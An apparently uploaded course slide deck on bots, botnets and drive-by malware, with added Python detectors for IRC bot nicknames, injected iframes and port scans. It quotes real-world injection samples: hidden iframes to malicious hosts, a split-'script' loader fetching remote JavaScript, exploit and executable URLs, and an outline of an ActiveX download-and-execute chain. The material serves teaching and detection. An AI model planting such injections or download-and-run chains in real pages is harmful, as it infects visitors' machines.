Bots and Malware: by Amy Farina

Uploaded by mathpalsonu
License: Attribution Non-Commercial (BY-NC)

BOTS and MALWARE

by Amy Farina

“Internet malware attacks have evolved into better organized and
more profit-centered endeavors. Email spam, extortion
through denial-of-service attacks and click fraud represent
a few examples of this emerging trend.
Botnets are a root cause of these problems.”
– Wang, Sparks, Zou: An Advanced Hybrid Peer-to-Peer Botnet
Presentation to cover:

1. What are bots, botnets, botmasters/herders, etc?
2. How can they be detected?
3. How they have evolved over time
4. Conclusion
What is a bot / botnet?
• A bot is a term used to describe an
automated ‘robot’ process but is also
commonly used to describe a
compromised host (aka, zombie, drone)
• A botnet is a network of compromised
computers controlled by a botmaster/
botherder/controller. Bot armies can be
hundreds to thousands of compromised
machines
Background Info/Definitions
• Host control mechanisms
• Traditional propagation
• Traditional methods of detection
• Evolution of bots to HTTP and P2P, most
still use IRC - proposed hybrids using both
IRC/P2P or HTTP alone for future bots
What is a bot / botnet?
• A botnet requires a server to act as a command
and control center (C&C)
• Two different IRC server software
implementations are commonly used to run a
botnet: Unreal IRCd and ConferenceRoom.
• Most botnets that have appeared in the past
have used a centralized architecture, bots
connect directly via IRC channels to a C&C
server, usually there are several C&C servers.
• Besides IRC more and more bots are using
other protocols such as HTTP as a
communication channel (P2P “superbot”).
Architecture of a botnet
Advanced Hybrid Peer-to-peer
Practical challenges faced by botmasters:
• How to generate a robust botnet capable of maintaining control of its
remaining bots even after a substantial portion of the botnet
population has been removed by defenders?
• How to prevent significant exposure of the network topology when
some bots are captured by defenders?
• How to easily monitor and obtain the complete information of a
botnet by its botmaster?
• How to prevent (or make it harder) defenders from detecting bots
via their communication traffic patterns?
• In addition, the design should also consider many network related
issues such as dynamic or private IP addresses and the diurnal
online/offline property of bots
New Botnets - Hybrids
• No bootstrap process
• Communicates via peer list but does not
reveal it to other bots
• Report command – changes IP address each
time
• Update command – updates peer list
• Only static global IPs for servant bots
• Servant bot listens on determined service
port using encryption
How do they get there?

EXPLOITS – examples: LSASS (TCP 445); weak NetBios (TCP 139, 137); RPC (TCP 135, 4445, 1025). Direct attacks, used heavily in 2004, 2005.
DOWNLOADS – examples: free games that install keyloggers, sniffers, backdoors, or start a proxy server (social engineering).
DRIVE-BYs – examples: iframes, javascript attacks, templates, advertising. Heavily used in 2006, 2007.
3rd PARTY – examples: 3rd party software – indirect vulnerabilities, web server compromises, web servers, etc.
BOTS: Agobot (PCWorld ranked ‘best bot’)
Agobot’s evolution has included an ever broadening set of
exploits instead of individual versions with their own exploits.
The exploits in the version of Agobot that we evaluated
include:

• Bagle scanner: scans for back doors left by Bagle variants on port 2745.
• Dcom scanners (1/2): scans for the well known DCE-RPC buffer
overflow.
• MyDoom scanner: scans for back doors left by variants of the MyDoom
worm on port 3127.
• Dameware scanner: scans for vulnerable versions of the Dameware
network administration tool.
• NetBIOS scanner: brute force password scanning for open NetBIOS
shares.
• Radmin scanner: scans for the Radmin buffer overflow.
• MS-SQL scanner: brute force password scanning for open SQL servers.
• Generic DDoS module: enables seven types of denial of service attack
against a targeted host
IRC BOTS: sdbot, spybot, gtbot
• SDBot does not have any exploits packaged in
its standard distribution. There are, however,
numerous variants that include specific exploits.
• Spybot only includes attacks on NetBIOS open
shares. However, as with SDBot, there are many
variants that include a wide range of exploits.
• The exploit set for the GTBot code was
developed to include RPC-DCOM exploits. Like
SDBot and Spybot, there are many variants of
GT Bot that include other well known exploits.
How to detect IRC bots?
• If a standardized protocol like IRC is used, detection
can be easier.

[nick collisions: IETF RFC 1459 specification for IRC]

If a NICK message arrives at a server which
already knows about an identical nickname for
another client, a nickname collision occurs. As
a result of a nickname collision, all instances of
the nickname are removed from the server's
database, and a KILL command is issued to remove
the nickname from all other server's database. If
the NICK message causing the collision was a
nickname change, then the original (old) nick must
be removed as well. If the server receives an
identical NICK from a client which is directly
connected, it may issue an ERR_NICKCOLLISION to
the local client, drop the NICK command, and not
generate any kills.
Example of IRC bot detection
Rishi: Identify Bot Contaminated Hosts by IRC
Nickname Evaluation – proof of concept
• techniques are mainly based on passively
monitoring network traffic for unusual or
suspicious IRC nicknames, IRC servers, and
uncommon server ports.
• using n-gram analysis and a scoring system,
detect bots that use uncommon communication
channels, which are commonly not detected by
classical intrusion detection systems.
• statistics like mean packet length of IRC packets
and the distribution of IRC messages like JOIN
or PING/PONG
Need for unique NICK
• RBOT|XP|48124
• # ngrep [...] 'JOIN|NICK|MODE|USER|QUIT' \
  'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x4e49434b'
  (the BPF filter selects TCP segments whose payload starts with the bytes "NICK")
• For each IRC connection a connection object is
created, which stores the above mentioned
information, plus an additional identifier
^\[[0-9]{1,2}\|[A-Z]{2,3}\|[0-9]{4,}\]$ which matches
common bot nicknames like [00|DEU|597660],
[03|USA|147700] or [0|KOR|43724]
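The nickname checks described on the last two slides (passively watching NICK messages, the regular expression for the [NN|CCC|NNNN...] template, and an n-gram style scoring of the nickname) can be shown in a short detector. This is an added example, not code from the Rishi tool or from this presentation; the feature weights, the flagging threshold and the sample NICK lines are assumptions constructed for it.

```python
import re

# Nickname template quoted in the Rishi description on this page:
# e.g. [00|DEU|597660], [03|USA|147700], [0|KOR|43724]
BOT_NICK_RE = re.compile(r"^\[[0-9]{1,2}\|[A-Z]{2,3}\|[0-9]{4,}\]$")

# IRC NICK command, with or without a leading ":prefix" (RFC 1459 message format)
NICK_CMD_RE = re.compile(r"^(?::\S+\s+)?NICK\s+:?(\S+)", re.IGNORECASE)

# Threshold and feature weights are assumptions for this example,
# not values used by the Rishi tool.
FLAG_THRESHOLD = 5


def extract_nick(line):
    """Return the nickname from an IRC NICK line, or None for any other message."""
    m = NICK_CMD_RE.match(line.strip())
    return m.group(1) if m else None


def _char_class(c):
    if c.isalpha():
        return "L"
    if c.isdigit():
        return "D"
    return "O"


def class_changes(nick):
    """Count letter/digit/other transitions between adjacent characters.
    A crude character n-gram feature: 'john42' has one, '[00|DEU|597660]' has six."""
    classes = [_char_class(c) for c in nick]
    return sum(1 for a, b in zip(classes, classes[1:]) if a != b)


def score_nick(nick):
    """Heuristic bot-likeness score; higher is more suspicious."""
    score = 0
    if BOT_NICK_RE.match(nick):                      # exact match on the known template
        score += 10
    longest_digits = max((len(r) for r in re.findall(r"[0-9]+", nick)), default=0)
    if longest_digits >= 4:                          # long numeric IDs such as 48124, 597660
        score += 3
    if len(re.findall(r"[|\-_\[\]]", nick)) >= 2:    # several field separators
        score += 2
    if re.search(r"(?:^|[|\-_\[])[A-Z]{2,3}(?:[|\-_\]]|$)", nick):  # DEU / USA / XP style tokens
        score += 2
    if class_changes(nick) >= 3:                     # many class transitions
        score += 2
    return score


def scan_log(lines):
    """Return (nick, score, flagged) for every NICK line in a list of IRC messages."""
    results = []
    for line in lines:
        nick = extract_nick(line)
        if nick is None:
            continue
        s = score_nick(nick)
        results.append((nick, s, s >= FLAG_THRESHOLD))
    return results


# Constructed sample traffic (not captured data): two bot-style nicks, two human ones.
SAMPLE_LINES = [
    "NICK [00|DEU|597660]",
    "NICK RBOT|XP|48124",
    "NICK :alice",
    ":bob!u@host NICK :bob_away",
    "USER bob 0 * :Bob",            # not a NICK message, ignored
]

if __name__ == "__main__":
    for nick, s, flagged in scan_log(SAMPLE_LINES):
        print(f"{nick:20} score={s:2} {'BOT?' if flagged else 'ok'}")
```

The exact-template regex is what catches the nicknames quoted on the slide; the remaining features are there so that a nick like RBOT|XP|48124, which does not match the template, still scores above the threshold, while ordinary nicknames score zero. As the next slide notes, none of this helps once a bot renames the NICK command itself.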
Rishi not completely effective
“…an incident from December 2006. During that time we
observed that Rishi logged several channel joins to
an IRC server on port 54932, without any further
information like nickname or user mode.
Fortunately, we could extract the destination IP
address from the Rishi log files. We started a
separated packet capture instance to analyse
network traffic to and from the suspicious IRC
server. As a result, we noticed that the bot
utilized its own IRC protocol by changing a few
basic commands to customized ones. The command NICK
was changed to SENDN, USER was changed to SENDU,
and PRIVMSG was changed to SENDM. So in this case
we were lucky as the bot missed to also change the
JOIN command which triggered our botnet detection
software. In the case where all IRC commands are
customized, there is almost no chance for Rishi to
detect an infected host at this time, as it is the
case with many signature based detection
mechanisms.”
Ports used
Geographical dist of C&Cs
New Bots – HTTP / P2P
• Detecting these new bots
• Drive-by infections
• Google presentation at HotBots - The Ghost
In The Browser: Analysis of Web-based
Malware
• Honeymonkeys
• Create repository of web pages attempting
to exploit web browsers
• Started in March 2006 for 12 months
Web-based Malware detection

[Diagram: 4 main sources – Web Server Security, Advertising, Third-Party Widgets, User contributed content – feed Browser Exploits, which lead to Malware & Botnets]
Their purpose and findings
• How does malware take advantage of
browser vulnerabilities & install binaries on
users’ computers?
• Distribution of these binaries and evolution
of new botnets?
• Determine the extent of these new botnets
and how they are formed – like hybrids
Methods and findings
• Run IE in a virtual machine and navigate to
URLs in a repository of bad sites
• Record all HTTP fetches, state changes,
new processes started, registry and file
system changes
• Analyzed content of several billion URLs,
in-depth analysis on 4.5 billion; from that,
450,000 were successfully launching
drive-by downloads (another 700,000
malicious but had lower confidence)
Drive-by Infection Vectors
WebServer security:

<!-- Copyright Information -->
<div align='center' class='copyright'>Powered by
<a href="http://www.invisionboard.com">Invision Power
Board</a>(U)
v1.3.1 Final &copy; 2003 &nbsp;
<a href='http://www.invisionpower.com'>IPS, Inc.</a></div>
</div>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/193/new.php'>
</iframe>
<iframe src='http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193'>
</iframe>
Drive-by Infection Vectors
User contributed content:
– If the inserted HTML contains an exploit, all
visitors of the posts or profile pages are
exposed to the attack.
– Example was a site that allowed users to
create their own online polls; javascript
redirected a user to a malicious site
(location.replace('http://videozfree.com');)
which used social engineering and exploit
code to infect visitors.
Drive-by Infection Vectors
Advertising:
In December 2006, via several hops using sub-
syndication, the iframe got redirected to a
Russian company which served up encrypted
javascript that attempted multiple exploits
against the browser and resulted in the
installation of several malware binaries on the
user’s computer.
Drive-by Infection Vectors
Third Party Widgets:
Example:
<!-- Begin Stat Basic code -->
<script language="JavaScript"
src="http://m1.stat.xx/basic.js">
</script><script language="JavaScript">
<!--
statbasic("ST8BiCCLfUdmAHKtah3InbhtwoWA", 0);
// -->
</script> <noscript>
<a href="http://v1.stat.xx/stats?ST8BidmAHKthtwoWA">
<img src="http://m1.stat.xx/n?id=ST8BidmAHKthtwoWA"
border="0" nosave width="18" height="18"></a></noscript>
…changed in 2006 to:
Started to exploit every user visiting pages linked to the counter. Now
malicious JavaScript first records the presence of the following external
systems: Shockwave Flash, Shockwave for Director, RealPlayer,
QuickTime, VivoActive, LiveAudio, VRML, Dynamic HTML Binding,
Windows Media Services. It then outputs another piece of JavaScript to the
main page:
d.write("<scr"+"ipt language='JavaScript'
type='text/javascript'
src='http://m1.stats4u.yy/md.js?country=us&id="+ id +
"&_t="+(new Date()).getTime()+"'></scr"+"ipt>")
This in turn triggers another wave of implicit downloads finally resulting in exploit code.
http://expl.info/cgi-bin/ie0606.cgi?homepage
http://expl.info/demo.php
http://expl.info/cgi-bin/ie0606.cgi?type=MS03-11&SP1
http://expl.info/ms0311.jar
http://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-11
http://dist.info/f94mslrfum67dh/winus.exe
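The two injection patterns shown across these Drive-by Infection Vectors slides, an iframe appended below a legitimate forum footer and a counter script that document.write()s a split "<scr"+"ipt" tag, can both be spotted by a static scan of the HTML a server actually serves. The scanner below is an added example, not code from the Google paper or from this presentation; the sample page, the placeholder .test hosts and the hidden-iframe heuristic are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Matches the "<scr"+"ipt" / "</scr"+"ipt" string splitting seen in the stats4u widget above
SPLIT_SCRIPT_RE = re.compile(r"""</?scr["']\s*\+\s*["']ipt""", re.IGNORECASE)


class IframeCollector(HTMLParser):
    """Collect the attribute dictionary of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def is_hidden(attrs):
    """True if the iframe is sized to zero or hidden via inline style (heuristic)."""
    dims = (attrs.get("width", ""), attrs.get("height", ""))
    if any(d.strip().rstrip("px").strip() == "0" for d in dims):
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def scan_page(html, site_host):
    """Report off-site iframes and split-string script injection in one HTML document."""
    parser = IframeCollector()
    parser.feed(html)
    offsite = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        # frames on the site itself or its subdomains are expected; anything else is reported
        if host and host != site_host and not host.endswith("." + site_host):
            offsite.append({"src": src, "host": host, "hidden": is_hidden(attrs)})
    return {
        "offsite_iframes": offsite,
        "split_script_tags": len(SPLIT_SCRIPT_RE.findall(html)),
    }


# Constructed page modelled on the forum-footer example above; hosts are placeholders (.test TLD).
SAMPLE_PAGE = """
<div align='center' class='copyright'>Powered by
<a href="https://example-forum.test">Example Board</a> v1.3.1</div>
</div>
<iframe src='http://injected-placeholder.test/adv/193/new.php' width=0 height=0></iframe>
<iframe src="https://cdn.example-forum.test/embed/poll"></iframe>
<script>
d.write("<scr"+"ipt src='http://counter-placeholder.test/md.js?id="+id+"'></scr"+"ipt>")
</script>
"""

if __name__ == "__main__":
    report = scan_page(SAMPLE_PAGE, "example-forum.test")
    for f in report["offsite_iframes"]:
        print("off-site iframe:", f["src"], "(hidden)" if f["hidden"] else "")
    print("split script tags:", report["split_script_tags"])
```

Running this against a site's own pages on a schedule and diffing the report is a cheap way to notice the kind of footer injection shown on the Invision Power Board slide; the split-tag count is a signal for obfuscated loaders like the 2006 counter script, since legitimate code has little reason to hide the word "script" from a scanner.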
Malware and botnets
• Malware binaries are connected to compromised
sites and their corresponding binary distribution
URLs.
• The main difference between web-based
malware and traditional botnets is a looser
feedback loop for the command and control
network.
• Unlike traditional botnets, web-based malware is
pull based and more difficult to track. Finding all
the web-based infection vectors is a significant
challenge and requires almost complete
knowledge of the web as a whole.
New Exploiting Mechanisms
• the proliferation of technologies such as NATs
and firewalls makes it difficult to remotely
connect to and exploit services running on
users’ computers – this forced attackers to
discover other avenues of exploitation
• increased capabilities of web browsers
and their ability to execute code internally
or launch external programs make web
servers an attractive target for exploitation
Remote code execution
A twenty line Javascript can accomplish this
sequence of steps to launch any binary on a
vulnerable installation:
• The exploit is delivered to a user’s browser via an iframe
on a compromised web page.
• The iframe contains Javascript to instantiate an ActiveX
object that is not normally safe for scripting.
• The Javascript makes an XMLHTTP request to retrieve
an executable.
• Adodb.stream is used to write the executable to disk.
• A Shell.Application is used to launch the newly written
executable.
Conclusion
• Primary goals of botnets:
– information dispersion (Spam, DDoS)
– information harvesting (ID theft, password, financial
data theft)
– Information processing (cracking passwords stored as
MD5 hashes, CD Keys)
• Today many botnets use IRC as a form of C&C
and are most easily detected, large code base
for hackers, redundancy, scalability & versatility
(ex: agobot)
• Goal to develop methods for detection,
mitigation, and prevention
Botnet methods for exploits

[Diagram: Botnet Exploits – IRC, P2P, HTTP, Hybrids]

SDBot - Lab
• Simulate botnet controller using IRC to
control infected machines via IRC
• Redhat Workstation VM 4.0 host IRC and
malicious bot controller
• WinXP VM configured to connect to the
IRC daemon running on RedHat
• Implementation instructions via
Botnet3.doc
Code, packets, honeypots
• C++ code – Sdbot v0.5b & Agobot
• Captured ethereal network analysis of a
compromised host using DNS and HTTP
for transfer of encrypted payload
• HTTP floods
• GenII Honeynets – KYE, Tracking Botnets
– March 2005 Paper
– Honeynet Project great source for getting info
March 2005 Honeynet findings
Almost all bots used resource sharing but often these vulnerability-specific
ports:
• 42 - WINS (Host Name Server)
• 80 - www (vulnerabilities in Internet Information Server 4 / 5 or Apache)
• 903 - NetDevil Backdoor
• 1025 - Microsoft Remote Procedure Call (RPC) service and Windows
Messenger port
• 1433 - ms-sql-s (Microsoft-SQL-Server)
• 2745 - backdoor of Bagle worm (mass-mailing worm)
• 3127 - backdoor of MyDoom worm (mass-mailing worm)
• 3306 - MySQL UDF Weakness
• 3410 - vulnerability in Optix Pro remote access trojan (Optix Backdoor)
• 5000 - upnp (Universal Plug and Play: MS01-059 - Unchecked Buffer in
Universal Plug and Play can Lead to System Compromise)
• 6129 - dameware (Dameware Remote Admin - DameWare Mini Remote
Control Client Agent Service Pre-Authentication Buffer Overflow
Vulnerability)
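Because bots such as Agobot sweep for exactly these ports, a host that contacts many different machines on them is a strong sign of an infected scanner on the network. The detector below is an added example, not from the Honeynet paper or this presentation; it takes the port table from this slide (plus the exploit ports from the "How do they get there?" slide) and aggregates constructed flow records per source. The five-target threshold and the exclusion of port 80 are assumptions.

```python
from collections import defaultdict

# Vulnerability-specific ports from the March 2005 Honeynet findings above,
# plus the exploit ports listed on the "How do they get there?" slide.
BOT_TARGET_PORTS = {
    42: "WINS", 80: "www (IIS 4/5, Apache)", 135: "RPC", 137: "NetBIOS", 139: "NetBIOS",
    445: "LSASS", 903: "NetDevil backdoor", 1025: "RPC / Windows Messenger",
    1433: "ms-sql-s", 2745: "Bagle backdoor", 3127: "MyDoom backdoor",
    3306: "MySQL UDF", 3410: "Optix Pro backdoor", 4445: "RPC",
    5000: "upnp (MS01-059)", 6129: "DameWare",
}

# Port 80 is excluded by default: one host reaching many web servers is normal browsing.
# (Assumption for this example, as is the min_targets threshold below.)
DEFAULT_IGNORE = frozenset({80})


def find_scanners(flows, min_targets=5, ignore=DEFAULT_IGNORE):
    """Flag sources that contact at least `min_targets` distinct hosts on bot-targeted ports.

    `flows` is an iterable of (src_ip, dst_ip, dst_port) tuples, e.g. from NetFlow or a firewall log.
    """
    by_src = defaultdict(lambda: defaultdict(set))   # src -> port -> {dst, ...}
    for src, dst, dport in flows:
        if dport in BOT_TARGET_PORTS and dport not in ignore:
            by_src[src][dport].add(dst)
    report = {}
    for src, ports in by_src.items():
        distinct = set().union(*ports.values())
        if len(distinct) >= min_targets:
            report[src] = {
                "targets": len(distinct),
                "ports": sorted(ports),
                "labels": [BOT_TARGET_PORTS[p] for p in sorted(ports)],
            }
    return report


# Constructed flow records (not captured data): 10.0.0.5 sweeps six neighbours for the
# Bagle and MyDoom backdoors; 10.0.0.7 just browses a few web servers.
SAMPLE_FLOWS = (
    [("10.0.0.5", f"10.0.1.{i}", 2745) for i in range(1, 7)]
    + [("10.0.0.5", f"10.0.1.{i}", 3127) for i in range(1, 7)]
    + [("10.0.0.7", "10.0.1.1", 80), ("10.0.0.7", "10.0.1.2", 443), ("10.0.0.7", "10.0.1.3", 80)]
)

if __name__ == "__main__":
    for src, info in find_scanners(SAMPLE_FLOWS).items():
        print(f"{src}: {info['targets']} hosts on ports {info['ports']} ({', '.join(info['labels'])})")
```

Counting distinct destinations rather than packets is what separates a scanner from a busy but legitimate client, and keeping the port labels in the report tells the responder which worm backdoor or service the bot was looking for, which points at the likely infection vector on the hosts it reached.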
Comments and Questions

NJIT: IT-485
Digital Forensics

Professor: Det. Denman Powers
